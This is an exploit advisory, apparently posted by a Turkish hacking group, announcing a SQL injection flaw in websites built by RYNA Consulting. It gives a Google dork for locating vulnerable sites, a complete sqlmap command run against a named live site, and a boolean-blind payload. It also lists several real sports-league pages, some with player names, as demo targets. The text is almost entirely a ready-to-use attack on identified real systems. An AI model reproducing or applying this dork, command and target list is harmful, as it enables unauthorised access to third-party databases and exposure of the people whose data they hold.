#################################################################################
# Exploit Title: RYNA Consulting Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Site designed by RYNA Consulting" inurl:?id=
# Tested on : Kali Linux 2017.3
# Date : 09.01.2018
# Vendor Home: http://www.rynaconsulting.ca/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] Sql GET Parameter "_id" İs Vulnerable.
[+] The Back-End DBMS is MySQL
Command:root@TrazeR:~# sqlmap --random-agent --technique=BEUS --threads=3 --no-cast --timeout=10 -u "http://www.hsfalcons.ca/news.php?news_id=2506" --dbms=MySQL --tamper=space2comment --batch --dbs
Parameter: news_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: news_id=2506 AND 8796=8796
Demo Sql:
http://www.metrominorballhockey.ca/player_profile.php?id=937387[SQL]&name=Conor+Dinn
http://www.mountpearlblades.com/player_profile.php?id=936841[SQL]&name=Ryan+Collett
http://www.wcshl.com/player_profile.php?id=[SQL]920398&name=Lee+Smith
Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Göcebe & BlueTrojen & Ak_Bey